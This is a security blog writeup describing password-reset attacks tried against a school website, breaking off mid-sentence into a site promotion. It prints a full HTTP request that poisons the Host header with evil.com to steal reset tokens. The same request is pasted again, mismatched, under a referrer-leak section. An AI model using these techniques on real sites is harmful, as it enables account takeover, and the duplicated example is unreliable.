How I Gained Account Access: Exploring the Risks of Password Reset Links in Cybersecurity
Hello everyone, I hope you all are doing great.
I am back with another writeup.
So today we are going to talk about another bug that we found on the same website which we talked about in the last blog. If you haven’t read the blog Click Here.
So in the last blog, we got the information about the details of students and teachers through broken authentication. So now we will talk about another bug That we found on the same website which is Account Takeover Due to Password Reset.
The website has a reset password Function where a Teacher or a student can reset their password.
Now, If we reset our password we get a password reset link on the email that is registered with the ID. And through that password link, we can reset our password.
I tried many attacks which I know on forgot password page. So let’s talk about them one by one.
Token Leakage Via Host Header Poisoning
While resetting the password I modified the host header of the request to our controlled domain.
POST /password_reset_request HTTP/1.1
Host: evil.com
Cookie: _CPOMS_session=abc
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.victim.com/password_reset_request/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 242
Origin: https://www.victim.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
utf8=%E2%9C%93&authenticity_token=zhcnt99TV95yzcnXcS68k0rnsyfZBIro58NDMt55LgEB58wFbdAjtLluui2Hr9hZyHko2hmg9GWPcSMDITWA8A%3D%3D&password_reset_request%5Bauth_provider%5D=identity&password_reset_request%5Bemail%5D=test%40gmail.com&button=
In my case, It doesn’t work but if it works for you then you will receive a link that is formed with the host header, this instead links to the attacker’s website. When the target visits this site, their password reset token is sent to the attacker. The attacker now resets the target’s password using their password reset token.
Password Reset Token Leak Via Referrer
The HTTP referer is an optional HTTP header field that identifies the address of the webpage that is linked to the resource being requested. The Referer request header contains the address of the previous web page from which a link to the currently requested page was followed.
POST /password_reset_request HTTP/1.1
Host: evil.com
Cookie: _CPOMS_session=abc
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.victim.com/password_reset_request/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 242
Origin: https://www.victim.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
utf8=%E2%9C%93&authenticity_token=zhcnt99TV95yzcnXcS68k0rnsyfZBIro58NDMt55LgEB58wFbdAjtLluui2Hr9hZyHko2hmg9GWPcSMDITWA8A%3D%3D&password_reset_request%5Bauth_provider%5D=identity&password_reset_request%5Bemail%5D=test%40gmail.com&button=
How You Can Exploit This
Request the password reset to your email address and then click on the password reset link. You will notice 3rd party websites (like Facebook or Twitter)
Intercept the request in the burp proxy and check if the referer header is leaking the password reset token.
But in my case, it isn’t working. So I moved to the next one.
Sending an array of email addresses
Then I tried to send a password reset link to If You Want To Read More Visit Us